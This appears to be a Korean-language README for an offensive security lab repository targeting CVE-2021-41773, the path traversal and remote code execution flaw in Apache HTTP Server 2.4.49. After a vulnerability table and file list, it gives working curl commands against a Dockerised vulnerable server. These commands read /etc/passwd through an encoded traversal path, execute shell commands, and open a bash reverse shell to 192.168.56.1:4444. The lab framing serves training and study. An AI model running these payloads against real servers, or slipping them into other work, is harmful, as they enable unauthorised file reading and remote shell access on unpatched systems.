
Apache 2.4.49 경로 탐색 RCE
| 필드 | 세부 정보 |
|---|
| CVE ID | CVE-2021-41773 |
| CVSS | 9.8 CRITICAL |
| 영향받는 버전 | Apache HTTP Server 2.4.49만 해당 |
| 유형 | 경로 탐색 + 원격 코드 실행 |
| 수정 버전 | Apache 2.4.51 |
| 파일 | 설명 |
|---|---|
poc_41773.py | Team Zeta 배너가 포함된 Python PoC 익스플로잇 스크립트 |
docker-compose.yml | 취약한 랩 환경 구성 |
offensive_zeta_shell.txt | 라이브 세션 로그 — 익스플로잇 증거 |
screenshots/ | 증거 스크린샷 |
Offensive_Team_Zeta_FINAL_Report.pdf | 전체 익스플로잇 보고서 |
# 취약한 이미지 가져오기
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid
# 랩 시작
docker-compose up -d
# Apache 2.4.49 실행 확인
curl -I http://localhost:8080/
# 다음이 표시되어야 함: Server: Apache/2.4.49
# 경로 탐색을 통한 파일 읽기
curl --path-as-is \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
# 원격 코드 실행
curl --path-as-is \
-d 'echo Content-Type: text/plain; echo; id' \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
# 리버스 셸 (IP를 자신의 머신 IP로 교체)
curl --path-as-is \
-d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
"http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"